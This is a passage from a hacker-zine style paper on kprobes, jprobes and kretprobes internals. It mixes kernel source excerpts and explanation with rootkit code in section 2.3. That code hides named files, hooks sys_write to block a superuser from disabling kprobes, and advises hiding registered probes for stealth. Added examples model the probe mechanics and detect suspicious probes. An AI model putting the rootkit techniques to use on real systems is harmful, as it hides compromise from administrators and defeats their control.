So why write this? Because... we are hackers. Hackers should be aware of
any and all resources available to them -- some more auspicious than
others. Nonetheless, kprobes are a sweet deal when you consider that they
are a native kernel API that is ripe for abuse, even without exceeding
its scope. Due to limitations discussed later on, kprobes require some
extra innovation when determining how to perform certain tasks such as file
hiding and applying other interesting patches that could subvert or even
harden the kernel's integrity.


----[ 1.2 - About kprobes

Without a doubt, the best introduction to kprobes is kprobes.txt in the
Linux kernel source documentation. Make sure to read that when you get a
chance. Kprobes are a debugging API native to the Linux kernel that is
based on the processor's debug registers -- whatever the processor may be.
We are going to assume x86, which at this time has the most kprobe code
developed.

--From kprobes.txt --

Kprobes enables you to dynamically break into any kernel routine and
collect debugging and performance information non-disruptively. You
can trap at almost any kernel code address, specifying a handler
routine to be invoked when the breakpoint is hit.

There are currently three types of probes: kprobes, jprobes, and
kretprobes (also called return probes).  A kprobe can be inserted
on virtually any instruction in the kernel.  A jprobe is inserted at
the entry to a kernel function, and provides convenient access to the
function's arguments.  A return probe fires when a specified function
returns.

--

Based on this definition one can imagine that this kprobes interface may be
used to instrument the kernel in some useful ways, both for security and
anti-security; that is what this paper is about. In the recent past I
implemented some relatively powerful and complex security patches
using kprobes. That is not to say that other patching methods are
not still useful, but occasionally one may run into issues using traditional
methods such as kernel function trampolines, which are not SMP safe due
to the non-atomic nature of swapping code in and out. Kprobes are a native
interface, which is nice, but they still present some challenges due to
limitations we discuss throughout the paper. Kprobes can be used to patch
the kernel in some places, but cannot be used for everything. This is a
treatise that can shed some light on when and where kprobes can be used to
modify the behavior of the kernel. Sometimes they must be used in conjunction
with another patching method. Before we move on I wanted to point out the
following few facts:

kprobes show up as being registered here:

/sys/kernel/debug/kprobes/list

And can be enabled or disabled by writing a 0 or a 1 here:

/sys/kernel/debug/kprobes/enabled

The kprobe source code is located in the following locations:
/usr/src/linux/kernel/kprobes.c
/usr/src/linux/arch/x86/kernel/kprobes.c 

Keep in mind that jprobes/kretprobes are 100% based on kprobes, and
disabling kprobes as shown above will prevent any kretprobe/jprobe
code from working as well.

Moving on...


----[ 1.3 - Jprobe example

In this paper we will be working primarily with jprobes and kretprobes.
As shown in the kprobe documentation already, there are several functions
available for registering and unregistering these probes.

Let's pretend for a moment that we are interested in sys_mprotect, and we
want to inspect any calls to it, and the args that are being passed. For this
we could register a jprobe for sys_mprotect. The following code outlines the
general idea. Because we are setting a jprobe on a syscall, we need to either
declare our jprobe handler using 'asmlinkage' magic or get our args directly
from the registers. In our example I will get the args directly from the
registers just to show how to obtain the registers for the current task.

-- jprobe example 1 --


NOTE: The jprobe data types will be explained in detail in 2.2 [Jprobe
implementation]

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/kallsyms.h>
#include <linux/sched.h>
#include <linux/ptrace.h>

/* kallsyms_lookup_name() is exported to GPL modules only */
MODULE_LICENSE("GPL");

int n_sys_mprotect(unsigned long start, size_t len, long prot)
{
	/* Saved user-mode registers of the task that made the syscall */
	struct pt_regs *regs = task_pt_regs(current);
	
	start = regs->bx;
	len = regs->cx;
	prot = regs->dx;

	printk("start: 0x%lx len: %zu prot: 0x%lx\n", start, len,
	       (unsigned long)prot);
	jprobe_return();
	return 0;
}           

/*
	The following entry in struct jprobe is 'void *entry'
	and simply points to the jprobe function handler that will
	be executing when the probe is hit on the function entry
	point.
*/

static struct jprobe mprotect_jprobe = 
{
	.entry = (kprobe_opcode_t *)n_sys_mprotect  // function entry  
};

static int __init jprobe_init(void)
{
	int ret;

	/* kp.addr is kprobe_opcode_t *addr; from struct kprobe and */
	/* points to the probe point where the trap will occur. In */
	/* our case we are probing sys_mprotect */
	mprotect_jprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect");
	
	if ((ret = register_jprobe(&mprotect_jprobe)) < 0)
	{
		printk("register_jprobe failed for sys_mprotect\n");
		return -1;
	}
	
	return 0;
}


int init_module(void)
{
	/* Fail the module load if the probe could not be registered */
	return jprobe_init();
}

/* The module unload hook must be named cleanup_module() */
void cleanup_module(void)
{
	unregister_jprobe(&mprotect_jprobe);
}


In the above code, we register a jprobe for sys_mprotect. This means that
a breakpoint instruction is placed on the entry point of the function,
and as soon as it gets called a trap occurs and control is passed to our
n_sys_mprotect() jprobe handler. From this point we can analyze data such
as the arguments passed either in registers or on the stack, as well as any
kernel data structures. We can also modify kernel data structures, which 
is primarily what we rely on for our patches using kprobes. Any attempts
to modify the stack arguments or registers will be overridden as soon as
our handler function returns -- this is because kprobes saves the register
state and stack args prior to calling the handler, and restores these values
upon the jprobe_return(), at which point the real syscall or function will
execute and do its thing. We will get into much more detail on this topic
and how to actually modify stack arguments later on. 


----[ 1.4 - Kretprobe example and return probe patching technique

Moving on to kretprobes (also known as return probes). Without kretprobes it
would not be as easy to patch the kernel using kprobes. This is
because a kernel function that we set a jprobe on might re-modify a
kernel data structure that we modify, as soon as our jprobe handler returns.
If we apply a kretprobe to the situation we can modify that kernel data
structure after the real kernel function returns. Here is an example...
Let's say we want to modify the kernel data structure 'kstruct->x' (which is
fictitious). We want to modify it, but do not know what value we want to
apply to it until 'function_A' executes, but as soon as the real 'function_A'
executes after our jprobe handler, it sets the value 'kstruct->x' to something.
This is where kretprobes come into play. This is the approach we take, which
we can call the 'return probe patching' technique.

	1. [jprobe handler for function_A]    -> Determines the value that we want to set on kstruct->x
	2. [function_A] 		      -> Sets the value of kstruct->x to some value.
	3. [kretprobe handler for function_A] -> Sets the value of kstruct->x to value determined by jprobe handler.

So as you can see, with kretprobes we end up being able to set the final 
verdict on a value.

Here is a quick example of registering a kretprobe. We will use sys_mprotect
for this example as well.

The kretprobe data types will be explained in the section 2.4 [kretprobes
implementation].

static int mprotect_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
{
	printk("Original return address: 0x%lx\n", (unsigned long)ri->ret_addr);
	return 0;
}

static struct kretprobe mprotect_kretprobe =
{
	.handler = mprotect_ret_handler, // return probe handler
	.maxactive = NR_CPUS // max number of kretprobe instances
};


int init_module(void)
{
	mprotect_kretprobe.kp.addr = (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect");
	/* Return the registration result so a failed probe aborts the load */
	return register_kretprobe(&mprotect_kretprobe);
}

As you can see I utilize kallsyms_lookup_name(), but interestingly a probe
can be set on virtually any instruction within the kernel; whatever means
you use to get that location is up to you (e.g. System.map).


So as you can see, the code is straightforward. From an internal point
of view -- by the time sys_mprotect returns, the address at the top of 
the stack (the ret address) has been modified to point to a function 
called kretprobe_trampoline() which in turn sets things up to call 
our mprotect_ret_handler() function where we can inspect and modify 
kernel data. No point in modifying the registers because they were 
all saved on the stack and will be reset as soon as our handler returns. 
More on this in the next section. The kretprobe trampoline function will be
explored in detail in 2.4 [Kretprobe implementation].


---[ 2 - Kprobes implementation

----[ 2.1 - Kprobe implementation

Firstly I want to make sure we are on the same page about what a basic
kprobe is, and the general idea of how it works.

-- Taken from kprobes.txt:

When a kprobe is registered, Kprobes makes a copy of the probed
instruction and replaces the first byte(s) of the probed instruction
with a breakpoint instruction (e.g., int3 on i386 and x86_64).

When a CPU hits the breakpoint instruction, a trap occurs, the CPU's
registers are saved, and control passes to Kprobes via the
notifier_call_chain mechanism.
Kprobes executes the "pre_handler" associated with the kprobe, passing 
the handler the addresses of the kprobe struct and the saved registers.

Next, Kprobes single-steps its copy of the probed instruction.
It would be simpler to single-step the actual instruction in place,
but then Kprobes would have to temporarily remove the breakpoint
instruction. This would open a small time window when another CPU
could sail right past the probepoint.

After the instruction is single-stepped, Kprobes executes the
"post_handler," if any, that is associated with the kprobe.
Execution then continues with the instruction following the probepoint.

--

So to clarify, when registering a typical kprobe a pre_handler should
always be assigned so that you can inspect data or do whatever you want
during that point. A post handler may or may not be assigned.

Since we are primarily using jprobes and kretprobes which are extensions
of the kprobe interface, I have chosen to primarily discuss their implementation
more so than a plain kprobe. All you need to know for now is that registering
a basic kprobe inserts a breakpoint instruction on the desired location, and
executes a pre and a post handler that you assign. As you will see in the jprobe and
kretprobe implementations which are implemented using a basic kprobe with
a pre and post handler, the pre and post handlers point to special kernel
functions [/usr/src/linux/arch/x86/kernel/kprobes.c] that act as a sort of
prologue/epilogue for the actual handler that executes the instructions.
More will be revealed in the following sections.


----[ 2.2 - Jprobe implementation

If we are aware of the internal implementation of jprobes and kretprobes
then we can utilize them better, and we could even patch the interface
itself to act more like we want it, but this defeats the purpose of this
paper which aims at patching the kernel using the kprobes interface as it
is, although we will explore some external modifications of kprobes later
on.

Firstly take a look at the following struct:

struct jprobe {
        struct kprobe kp;
        void *entry;    /* probe handling code to jump to */
};

When we call register_jprobe() it in turn calls register_jprobes(&jp, 1).
register_jprobes() is all about setting up the jprobe pre/post and entry
handler.

-- snippet from register_jprobes() in /usr/src/linux/kernel/kprobes.c --

                /* See how jprobes utilizes kprobes? It uses the */
                /* pre/post handler */
                jp->kp.pre_handler = setjmp_pre_handler;
                jp->kp.break_handler = longjmp_break_handler;
                ret = register_kprobe(&jp->kp);
--

The pre_handler is called before your function/entry handler and is responsible
for saving the contents of the stack and the registers and setting the eip. In
normal circumstances the developer has no control over the pre/post
handler for jprobes because the kprobe pre and post handler entries within
struct kprobe do not point to your own custom handlers, but instead to
specialized handlers specifically for the jprobe prologue/epilogue.

        /* Called before addr is executed. */
        kprobe_pre_handler_t pre_handler;

        /* Called after addr is executed, unless... */
        kprobe_post_handler_t post_handler;

You could say that the execution of a jprobe looks like this:

	1. [jprobe pre_handler] Backup stack and register state
	2. [jprobe function handler] Do elite modifications to kernel
	3. [jprobe post_handler] Restore original stack and registers.

Lets take a peek at the pre_handler which backs up the stack and registers.

int __kprobes setjmp_pre_handler(struct kprobe *p, struct pt_regs *regs)
{
        struct jprobe *jp = container_of(p, struct jprobe, kp);
        unsigned long addr;
        struct kprobe_ctlblk *kcb = get_kprobe_ctlblk();

        kcb->jprobe_saved_regs = *regs;
        kcb->jprobe_saved_sp = stack_addr(regs);
        addr = (unsigned long)(kcb->jprobe_saved_sp);

        /*
         * As Linus pointed out, gcc assumes that the callee
         * owns the argument space and could overwrite it, e.g.
         * tailcall optimization. So, to be absolutely safe
         * we also save and restore enough stack bytes to cover
         * the argument area.
         */
        memcpy(kcb->jprobes_stack, (kprobe_opcode_t *)addr,
               MIN_STACK_SIZE(addr));
        regs->flags &= ~X86_EFLAGS_IF;
        trace_hardirqs_off();
        regs->ip = (unsigned long)(jp->entry);
        return 1;
}

Pay close attention to the code comment above; Like with Chuck Norris... if Linus
says it, then it MUST be true! 

As you can see, the function gets the current stack location using the stack_addr()
macro, and then memcpy's it over to kcb->jprobes_stack which is a backup of the
stack to be restored in the post handler. The stack being restored prior to the
real function being called does impose some obvious restrictions, but that does
not mean that we can't manipulate the pointer values that are passed on the stack
which is something we take advantage of in section 2.3 (File hiding). After
the jprobe handler is finished, the jprobe post handler is called -- here
is the code.

int __kprobes longjmp_break_handler(struct kprobe *p, struct pt_regs *regs)
{
        struct kprobe_ctlblk *kcb = get_kprobe_ctlblk();
        u8 *addr = (u8 *) (regs->ip - 1);
        struct jprobe *jp = container_of(p, struct jprobe, kp);

        if ((addr > (u8 *) jprobe_return) &&
            (addr < (u8 *) jprobe_return_end)) {
                if (stack_addr(regs) != kcb->jprobe_saved_sp) {
                        struct pt_regs *saved_regs =
                                &kcb->jprobe_saved_regs;
                        printk(KERN_ERR
                         "current sp %p does not match saved sp %p\n",
                               stack_addr(regs), kcb->jprobe_saved_sp);
                        printk(KERN_ERR "Saved registers for jprobe %p\n",
                               jp);
                        show_registers(saved_regs);
                        printk(KERN_ERR "Current registers\n");
                        show_registers(regs);
                        BUG();
                }
                *regs = kcb->jprobe_saved_regs;
                memcpy((kprobe_opcode_t *)(kcb->jprobe_saved_sp),
                       kcb->jprobes_stack,
                       MIN_STACK_SIZE(kcb->jprobe_saved_sp));
                preempt_enable_no_resched();
                return 1;
        }
        return 0;
}


The code primarily restores the stack and re-enables preemption; probe 
handlers are run with preemption disabled.
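
The following user-space model is an added example, not kernel code and not
the author's. Its struct and function names are stand-ins for pt_regs,
kprobe_ctlblk and the two handlers shown above, and the sample arguments are
constructed. It shows that a handler's edits to by-value arguments and
registers are thrown away by the restore step, that a write through a pointer
argument survives, and that a moved stack pointer is rejected.

```c
/* Added example: user-space model of the jprobe save/restore sequence. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ARG_WORDS 4                       /* argument area covered by the snapshot */

struct regs { uintptr_t ip, sp, bx; };    /* stand-in for struct pt_regs */

struct cpu {                              /* one modelled CPU at function entry */
    struct regs regs;
    uintptr_t stack[ARG_WORDS];           /* stack[0] = flags, stack[1] = char *label */
};

struct ctlblk {                           /* stand-in for struct kprobe_ctlblk */
    struct regs saved_regs;
    uintptr_t saved_sp;
    uintptr_t saved_stack[ARG_WORDS];
};

struct outcome {                          /* what the probed function finally saw */
    uintptr_t flags, bx;
    char label[16];
};

typedef void (*entry_fn)(struct cpu *);

/* Mirrors setjmp_pre_handler(): snapshot registers and argument words. */
static void model_pre_handler(struct ctlblk *kcb, const struct cpu *c)
{
    kcb->saved_regs = c->regs;
    kcb->saved_sp = c->regs.sp;
    memcpy(kcb->saved_stack, c->stack, sizeof(c->stack));
}

/* Mirrors longjmp_break_handler(): refuse a moved stack pointer (the kernel
   calls BUG() there), otherwise put the snapshot back. */
static int model_break_handler(const struct ctlblk *kcb, struct cpu *c)
{
    if (c->regs.sp != kcb->saved_sp)
        return -1;
    c->regs = kcb->saved_regs;
    memcpy(c->stack, kcb->saved_stack, sizeof(c->stack));
    return 0;
}

/* The probed function: reads its arguments from the restored argument area. */
static void probed_function(const struct cpu *c, struct outcome *o)
{
    o->flags = c->stack[0];
    o->bx = c->regs.bx;
    snprintf(o->label, sizeof(o->label), "%s", (const char *)c->stack[1]);
}

/* Handler that edits a by-value argument, a register and a pointee. */
void tamper_handler(struct cpu *c)
{
    c->stack[0] = 0xdead;                 /* inside the snapshot: discarded */
    c->regs.bx = 0xdead;                  /* inside the snapshot: discarded */
    ((char *)c->stack[1])[0] = 'X';       /* memory behind a pointer: persists */
}

/* Handler that returns with a different stack pointer. */
void sp_shift_handler(struct cpu *c)
{
    c->regs.sp -= sizeof(uintptr_t);
}

/* Run one probed call; returns -1 if the restore step rejects the handler. */
int run_probed_call(entry_fn handler, uintptr_t flags, char *label,
                    struct outcome *o)
{
    struct cpu c = { .regs = { .ip = 0, .sp = 0x1000, .bx = flags },
                     .stack = { flags, (uintptr_t)label } };
    struct ctlblk kcb;

    model_pre_handler(&kcb, &c);
    handler(&c);                          /* regs->ip = jp->entry in the kernel */
    if (model_break_handler(&kcb, &c) != 0)
        return -1;
    probed_function(&c, o);               /* original function runs afterwards */
    return 0;
}

int main(void)
{
    char label[] = "secret";              /* constructed sample input */
    struct outcome o;

    if (run_probed_call(tamper_handler, 7, label, &o) == 0)
        printf("flags=%lu bx=%lu label=%s\n",
               (unsigned long)o.flags, (unsigned long)o.bx, o.label);
    printf("sp-shifting handler -> %d\n",
           run_probed_call(sp_shift_handler, 7, label, &o));
    return 0;
}
```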


----[ 2.3 - File hiding using jprobes/kretprobes

Let's consider a simple file hiding approach that consists of using the 
dirent->d_name pointer in filldir64(). 


char *hidden_files[] = 
{
#define HIDDEN_FILES_MAX 3
	"test1",
	"test2",
	"test3"
};

struct getdents_callback64 {
        struct linux_dirent64 __user * current_dir;
        struct linux_dirent64 __user * previous;
        int count;
        int error;
};

/* Global data for kretprobe to act on */
static struct global_dentry_info
{
        unsigned long d_name_ptr;
        int bypass;
} g_dentry;

/* Our jprobe handler that globally saves the pointer value of dirent->d_name */
/* so that our kretprobe can modify that location */
static int j_filldir64(void * __buf, const char * name, int namlen, loff_t 
offset, u64 ino, unsigned int d_type)
{
        
        int found_hidden_file, i;
        struct linux_dirent64 __user *dirent;
        struct getdents_callback64 * buf = (struct getdents_callback64 *) __buf;
        dirent = buf->current_dir;
        int reclen = ROUND_UP64(NAME_OFFSET(dirent) + namlen + 1);
        
        /* Initialize custom stuff */
        g_dentry.bypass = 0;
        found_hidden_file = 0;
        
        for (i = 0; i < HIDDEN_FILES_MAX; i++)
                if (strcmp(hidden_files[i], name) == 0)
                        found_hidden_file++;
        if (!found_hidden_file)
                goto end;
        
        /* Create pointer to where we need to modify in dirent */
        /* since someone is trying to view a file we want hidden */
        g_dentry.d_name_ptr = (unsigned long)(unsigned char *)dirent->d_name;
        g_dentry.bypass++; // note that we want to bypass viewing this file
        
        end:
 	jprobe_return();
        return 0;
}

/* Our kretprobe handler, which we use to nullify the filename */
/* Remember the 'return probe technique'? Well this is it. */
static int filldir64_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
{
        char *ptr, null = 0;
        /* Someone is looking at one of our hidden files */
        if (g_dentry.bypass)
        {
                /* Lets nullify the filename so it simply is invisible */
                ptr = (char *)g_dentry.d_name_ptr;
                copy_to_user((char *)ptr, &null, sizeof(char));
        }
        return 0;
}


The code above is quite adept at hiding files based on getdents64 being called	
but unfortunately 'ls' from GNU coreutils will call lstat64 for every d_name found,
and if some of the d_names start with a null byte then we will see an error returned
by lstat saying "Cannot access : : file not found". So if we are hiding 3 files, then
we will see that error message 3 times prior to the directory listing (which will not
show the hidden files). One of the primary limitations of kprobe patching
is that we cannot modify the return value of a function; the closest we can get is
setting up a return probe to modify data that the function may have operated on. 
There are some indirect methods of altering the return value at times, but after
following the code path for lstat64 I found no way to remedy the issue using kprobes.
Instead I found the not-so-elegant approach of redirecting the stderr to /dev/null
by setting a jprobe and a return probe on sys_write. Additionally, while modifying
sys_write, we might as well redirect any attempts to disable kprobes to /dev/null
as well. A super user can simply 'echo 0 > /sys/kernel/debug/kprobes/enabled' to
disable the kprobes interface (We don't want this). One of the parameters we will 
pass to insmod when installing our LKM will be the inode of the 'enabled' /sys entry. 
Below is the code for our modified sys_write.

asmlinkage static int j_sys_write(int fd, void *buf, unsigned int len)
{
        char *s = (char *)buf;
        char null = '\0';
        char devnull[] = "/dev/null";
        struct file *file;
        struct dentry *dentry = NULL;
        unsigned int ino;
        int ret;
 	char comm[255];
	
        stream_redirect = 0; // do we redirect to /dev/null?
 
	/* Make sure this is an ls program */
	/* otherwise we'd prevent other programs */
	/* From being able to send 'cannot access' */
	/* in their stderr stream, possibly */       
	get_task_comm(comm, current);
	if (strcmp(comm, "ls") != 0)
		goto out;

        /* check to see if this is an ls stat complaint, or ls -l weirdness */
	/* There are two separate calls to sys_write hence two strstr checks */
        if (strstr(s, "cannot access") || strstr(s, "ls:"))  
        {
                printk("Going to redirect\n");
                goto redirect;  
        }
        /* Check to see if they are trying to disable kprobes */
        /* with 'echo 0 > /sys/kernel/debug/kprobes/enabled' */
        file = fget(fd);
        if (!file)
                goto out;
        dentry = dget(file->f_dentry);
        if (!dentry)
                goto out;
        ino = dentry->d_inode->i_ino;
        dput(dentry);
        fput(file);
        if (ino != enabled_ino)
                goto out; 
        
        redirect:
        /* If we made it here, then we are doing a redirect to /dev/null */
        stream_redirect++;
        mm_segment_t o_fs = get_fs();
        set_fs(KERNEL_DS);

        n_sys_close(fd);
        fd = n_sys_open(devnull, O_RDWR, 0);
        
        set_fs(o_fs);
        global_fd = fd;

	out:
	jprobe_return();
	return 0;
}
/* Here is the return handler to close the fd to /dev/null. */
static int sys_write_ret_handler(struct kretprobe_instance *ri, struct pt_regs *regs)
{
        if (stream_redirect)
        {
                n_sys_close(global_fd);
                stream_redirect = 0;
        }
        return 0;
}

We close the existing file descriptor and open a new one that will
use the same fd number. This redirection of stderr to /dev/null is only for the
current process. To understand it a bit more we can follow the code path of
do_sys_open(), I've added some extra comments:
 
long do_sys_open(int dfd, const char __user *filename, int flags, int mode)
{
        char *tmp = getname(filename);
        int fd = PTR_ERR(tmp);

        if (!IS_ERR(tmp)) {
                fd = get_unused_fd_flags(flags);
                if (fd >= 0) {
                        struct file *f = do_filp_open(dfd, tmp, flags,
			mode, 0);
                        if (IS_ERR(f)) {
                                put_unused_fd(fd);
                                fd = PTR_ERR(f);
                        } else {

				/* Notice fsnotify_open() */
                                fsnotify_open(f->f_path.dentry); 
				
				/* Associate fd with /dev/null */
                                fd_install(fd, f);
                                trace_do_sys_open(tmp, flags, mode);
                        }
                }
                putname(tmp);
        }
        return fd;
}

The new file descriptor is associated with its new file (struct
files_struct *) for the current task using fd_install().

void fd_install(unsigned int fd, struct file *file)
{
        struct files_struct *files = current->files; // <--  notice here
        struct fdtable *fdt;
        spin_lock(&files->file_lock);
        fdt = files_fdtable(files);     // <-- notice here
        BUG_ON(fdt->fd[fd] != NULL);
        rcu_assign_pointer(fdt->fd[fd], file);   // <-- notice here
        spin_unlock(&files->file_lock);
}


One important note to the reader concerns /sys/kernel/debug/kprobes/list,
the file which shows any registered kprobes. Simply use a redirect
technique like the one we used above to track open's to that file and
redirect any writes to stdout to /dev/null if the list contains a 
probe that you have registered. Very trivial, and absolutely necessary
to maintain a stealth presence.
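
From the defender's side, the same list file is the first place to look. The
following C program is an added example, not code from the article: it parses
a listing in the format documented in kprobes.txt (address, type k/j/r,
symbol+offset, optional [DISABLED]/[GONE] markers) and flags the
jprobe-plus-kretprobe pairing used above. The watched symbol set and the
sample listing are assumptions constructed for illustration.

```c
/* Added example: triage of /sys/kernel/debug/kprobes/list content. */
#include <stdio.h>
#include <string.h>

#define MAX_PROBES 128
#define SYM_LEN 64

struct probe {
    unsigned long long addr;   /* column 1: probe address */
    char type;                 /* column 2: k, j or r */
    char sym[SYM_LEN];         /* column 3 with the +0x.. offset stripped */
    int disabled, gone;        /* trailing [DISABLED] / [GONE] markers */
};

struct report {
    int total, malformed;
    int watched;               /* probes sitting on a watched symbol */
    int jr_pairs;              /* symbols carrying a jprobe and a kretprobe */
    char pair_syms[8][SYM_LEN];
};

/* Assumption: the functions this article instruments; use a local baseline. */
static const char *const watched_syms[] = { "sys_write", "filldir64", "sys_mprotect" };

/* Parse "<hex addr>  <type>  <symbol>+0x<off> [markers]"; returns 0 on success. */
int parse_probe_line(const char *line, struct probe *p)
{
    memset(p, 0, sizeof(*p));
    if (sscanf(line, "%llx %c %63s", &p->addr, &p->type, p->sym) != 3)
        return -1;
    if (p->type != 'k' && p->type != 'j' && p->type != 'r')
        return -1;
    p->sym[strcspn(p->sym, "+")] = '\0';
    p->disabled = strstr(line, "[DISABLED]") != NULL;
    p->gone = strstr(line, "[GONE]") != NULL;
    return 0;
}

static int has_probe(const struct probe *v, int n, const char *sym, char type)
{
    for (int i = 0; i < n; i++)
        if (v[i].type == type && !v[i].gone && strcmp(v[i].sym, sym) == 0)
            return 1;
    return 0;
}

void scan_listing(const char *text, struct report *r)
{
    struct probe v[MAX_PROBES];
    char line[256];
    int n = 0;

    memset(r, 0, sizeof(*r));
    while (*text && n < MAX_PROBES) {
        size_t len = strcspn(text, "\n");
        snprintf(line, sizeof(line), "%.*s", (int)len, text);
        text += len + (text[len] == '\n');
        if (line[strspn(line, " \t\r")] == '\0')
            continue;                                  /* blank line */
        if (parse_probe_line(line, &v[n]) != 0) {
            r->malformed++;
            continue;
        }
        for (size_t i = 0; i < sizeof(watched_syms) / sizeof(*watched_syms); i++)
            r->watched += strcmp(v[n].sym, watched_syms[i]) == 0;
        n++;
    }
    r->total = n;
    /* A jprobe plus a kretprobe on one function is the layout of the
       article's 'return probe patching'; report each such symbol once. */
    for (int i = 0; i < n && r->jr_pairs < 8; i++) {
        int seen = 0;
        if (v[i].type != 'j' || v[i].gone || !has_probe(v, n, v[i].sym, 'r'))
            continue;
        for (int k = 0; k < r->jr_pairs; k++)
            seen |= strcmp(r->pair_syms[k], v[i].sym) == 0;
        if (!seen)
            strcpy(r->pair_syms[r->jr_pairs++], v[i].sym);
    }
}

/* Constructed sample in the kprobes.txt list format; addresses are made up. */
static const char sample_list[] =
    "c10d4a20  j  filldir64+0x0\n"
    "c10d4a20  r  filldir64+0x0\n"
    "c10c81f0  j  sys_write+0x0\n"
    "c10c81f0  r  sys_write+0x0\n"
    "c1033b50  k  do_fork+0x0    [DISABLED]\n"
    "c12f9c40  r  tcp_v4_rcv+0x0\n"
    "not a probe line\n";

int main(void)
{
    struct report r;
    scan_listing(sample_list, &r);
    printf("%d probes, %d malformed, %d on watched symbols, %d j+r pairs\n",
           r.total, r.malformed, r.watched, r.jr_pairs);
    return 0;
}
```

Because the article shows that reads of this file can be filtered on a
compromised host, a clean result from such a host proves nothing, while a hit
is still worth investigating.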

As the topic of rootkits has become trite ...
I would like to introduce some other kprobe examples. Firstly 
let us discuss the Kretprobe implementation in detail. It will
give some more insight into the limitations of kprobes and also
expand your mind on how the kprobe implementation may be modified --
which is not covered in this paper.


----[ 2.4 - Kretprobe implementation

The kretprobe implementation is especially interesting, primarily because
it is an innovative and nicely engineered chunk of code. Here is how it
works.

-- From the kprobes.txt --

When you call register_kretprobe(), Kprobes establishes a kprobe at
the entry to the function.  When the probed function is called and this
probe is hit, Kprobes saves a copy of the return address, and replaces
the return address with the address of a "trampoline."  The trampoline
is an arbitrary piece of code -- typically just a nop instruction.
At boot time, Kprobes registers a kprobe at the trampoline.

The kretprobe implementation is really just a creative way of using
kprobes by registering them and assigning the trap handlers to functions
that deal with modifying the return address.

-- From /usr/src/linux/kernel/kprobes.c --

int __kprobes register_kretprobe(struct kretprobe *rp)
{
        int ret = 0;
        struct kretprobe_instance *inst;
        int i;
        void *addr;
	
	... <code> ...
	
	rp->kp.pre_handler = pre_handler_kretprobe;
        rp->kp.post_handler = NULL;
        rp->kp.fault_handler = NULL;
        rp->kp.break_handler = NULL;

	... <code> ... 
}
	NOTE:
	Notice the rp->kp.pre_handler -- kp is struct kprobe 
	and the pre_handler is assigned pre_handler_kretprobe.

So when the return probe is hit, pre_handler_kretprobe() will call
arch_prepare_kretprobe() which saves the original return address and inserts
the new one:

void __kprobes arch_prepare_kretprobe(struct kretprobe_instance *ri,
                                      struct pt_regs *regs)
{
        unsigned long *sara = stack_addr(regs);

        ri->ret_addr = (kprobe_opcode_t *) *sara;

        /* Replace the return addr with trampoline addr */
        *sara = (unsigned long) &kretprobe_trampoline;
}

Notice the last line which sets the return address to the trampoline. The
trampoline is actually defined in an assembly stub, which for x86 looks
like this:

static void __used __kprobes kretprobe_trampoline_holder(void)
{
        asm volatile (
                        ".global kretprobe_trampoline\n"
                        "kretprobe_trampoline: \n"
                        /* 32-bit branch only; the CONFIG_X86_64 branch is omitted */
                        "       pushf\n"
                        /*
                         * Skip cs, ip, orig_ax and gs.
                         * trampoline_handler() will plug in these values
                         */
                        "       subl $16, %esp\n"
                        "       pushl %fs\n"
                        "       pushl %es\n"
                        "       pushl %ds\n"
                        "       pushl %eax\n"
                        "       pushl %ebp\n"
                        "       pushl %edi\n"
                        "       pushl %esi\n"
                        "       pushl %edx\n"
                        "       pushl %ecx\n"
                        "       pushl %ebx\n"
                        "       movl %esp, %eax\n"
                        "       call trampoline_handler\n"
                        /* Move flags to cs */
                        "       movl 56(%esp), %edx\n"
                        "       movl %edx, 52(%esp)\n"
                        /* Replace saved flags with true return address. */
                        "       movl %eax, 56(%esp)\n"
                        "       popl %ebx\n"
                        "       popl %ecx\n"
                        "       popl %edx\n"
                        "       popl %esi\n"
                        "       popl %edi\n"
                        "       popl %ebp\n"
                        "       popl %eax\n"
                        /* Skip ds, es, fs, gs, orig_ax and ip */
                        "       addl $24, %esp\n"
                        "       popf\n"
                        "       ret\n");
}

After the register state is backed up on the stack the stub calls
trampoline_handler() which essentially executes any return probe
handlers associated with the kretprobe for the given function. Looking at
the actual function gives some more insight.

static __used __kprobes void *trampoline_handler(struct pt_regs *regs)
{
        struct kretprobe_instance *ri = NULL;
        struct hlist_head *head, empty_rp;
        struct hlist_node *node, *tmp;
        unsigned long flags, orig_ret_address = 0;
        unsigned long trampoline_address =
                (unsigned long)&kretprobe_trampoline;

        INIT_HLIST_HEAD(&empty_rp);
        kretprobe_hash_lock(current, &head, &flags);
        /* fixup registers */
#ifdef CONFIG_X86_64
        regs->cs = __KERNEL_CS;
#else
        regs->cs = __KERNEL_CS | get_kernel_rpl();
        regs->gs = 0;
#endif
        regs->ip = trampoline_address;
        regs->orig_ax = ~0UL;

        /*
         * It is possible to have multiple instances associated with a
         * given
         * task either because multiple functions in the call path have
         * return probes installed on them, and/or more than one
         * return probe was registered for a target function.
         *
         * We can handle this because:
         *     - instances are always pushed into the head of the list
         *     - when multiple return probes are registered for the same
         *       function, the (chronologically) first instance's ret_addr
         *       will be the real return address, and all the rest will
         *       point to kretprobe_trampoline.
         */
        hlist_for_each_entry_safe(ri, node, tmp, head, hlist) {
                if (ri->task != current)
                        /* another task is sharing our hash bucket */
                        continue;

                if (ri->rp && ri->rp->handler) {
                        __get_cpu_var(current_kprobe) = &ri->rp->kp;
                        get_kprobe_ctlblk()->kprobe_status =
                                KPROBE_HIT_ACTIVE;
                        ri->rp->handler(ri, regs);
                        __get_cpu_var(current_kprobe) = NULL;
                }

                orig_ret_address = (unsigned long)ri->ret_addr;
                recycle_rp_inst(ri, &empty_rp);

                if (orig_ret_address != trampoline_address)
                        /*
                         * This is the real return address. Any other
                         * instances associated with this task are for
                         * other calls deeper on the call stack
      			*/
                        break;
        }

        kretprobe_assert(ri, orig_ret_address, trampoline_address);

        kretprobe_hash_unlock(current, &flags);

        hlist_for_each_entry_safe(ri, node, tmp, &empty_rp, hlist) {
                hlist_del(&ri->hlist);
                kfree(ri);
        }
        return (void *)orig_ret_address;
}

The original return address value is returned, and then the
kretprobe_trampoline stub copies it onto the stack at the right location.
At that point all of the saved registers are pop'd and restored, and
execution returns to the original calling function with the original return
value. I suppose it doesn't take an overactive imagination to see that the
kretprobe_trampoline stub code can be modified to return a different
value. This could be done in several ways, however it would exceed
the scope of hacking purely with kprobes. The arch_prepare_kretprobe()
